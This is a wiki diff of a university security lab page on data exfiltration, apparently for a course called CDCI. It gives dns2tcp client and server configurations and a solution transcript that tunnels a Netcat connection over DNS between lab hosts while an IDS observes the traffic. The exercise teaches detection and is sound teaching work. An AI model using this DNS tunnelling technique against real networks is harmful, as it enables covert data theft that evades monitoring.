This shows you the differences between two versions of the page.
cdci:labs:6 [2020/03/17 01:33] mihai.chiroiu [07. [20p] DNS exfiltration] |
cdci:labs:6 [2024/05/10 14:22] (current) mihai.chiroiu [01. [5p] Virtual machine setup] |
||
---|---|---|---|
Line 1: | Line 1: | ||
====== Lab06. Data exfiltration ====== | ====== Lab06. Data exfiltration ====== | ||
+ | |||
+ | <note warning> | ||
+ | Important read to be graded! | ||
+ | {{page>:cdci:rec&nofooter&noeditbutton&noheader}} | ||
+ | </note> | ||
===== Objectives ===== | ===== Objectives ===== | ||
Line 22: | Line 27: | ||
git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | git clone -b labs --single-branch https://github.com/mihai-chiroiu/cdci.git | ||
git config user.email "student@upb.ro" | git config user.email "student@upb.ro" | ||
+ | </code> | ||
+ | |||
+ | Now we need to build some docker containers | ||
+ | <code> | ||
+ | root@cdci:/# cd cdci/containers/exfiltration_lab06/ | ||
+ | root@cdci:/# make | ||
</code> | </code> | ||
Line 193: | Line 204: | ||
==== 07. [20p] DNS exfiltration ==== | ==== 07. [20p] DNS exfiltration ==== | ||
- | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark. | + | For this exercise we are going to create a DNS tunnel between the two nodes and use it for the Netcat connection. The tool for this is [[http://www.linuxcertif.com/man/1/dns2tcpc/|dns2tcp]]. Use the following configuration for the client/server side. |
- | + | * Client side configuration | |
- | a. Client side configuration: | + | <code> |
# cat .dns2tcprc | # cat .dns2tcprc | ||
domain = dns2tcp.cdci.ro | domain = dns2tcp.cdci.ro | ||
resource = nc | resource = nc | ||
- | local_port = 9000 | + | local_port = 8080 |
key = secretkey | key = secretkey | ||
- | b. Server side configuration: | + | </code> |
+ | * Server side configuration | ||
+ | <code> | ||
# cat .dns2tcpdrc | # cat .dns2tcpdrc | ||
listen = 0.0.0.0 | listen = 0.0.0.0 | ||
Line 210: | Line 223: | ||
domain = dns2tcp.cdci.ro | domain = dns2tcp.cdci.ro | ||
key = secretkey | key = secretkey | ||
- | resources = nc:127.0.0.1:9000 | + | resources = nc:127.0.0.1:8080 |
+ | </code> | ||
+ | To view the traffic you can use tcpdump on the IDS (to view it locally or to transfer it to your computer and open it with Wireshark). For this exercise we strongly encourage you to view the data in Wireshark. | ||
<solution> | <solution> | ||
<code> | <code> | ||
+ | root@h2:/# dns2tcpd -f .dns2tcpdrc | ||
+ | root@h2:/# netstat -nlup | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | udp 0 0 0.0.0.0:53 0.0.0.0:* 428/dns2tcpd | ||
+ | root@h2:/# nc -l -p 8080 -k | ||
+ | TEST | ||
+ | |||
+ | root@h1:/# dns2tcpc -f .dns2tcprc 192.168.16.3 & | ||
+ | [2] 196 | ||
+ | root@h1:/# Listening on port : 8080 | ||
+ | root@h1:/# netstat -nltp | ||
+ | Active Internet connections (only servers) | ||
+ | Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name | ||
+ | tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 196/dns2tcpc | ||
+ | root@h1:/# nc 127.0.0.1 8080 | ||
+ | TEST | ||
+ | ^C | ||
</code> | </code> | ||
</solution> | </solution> |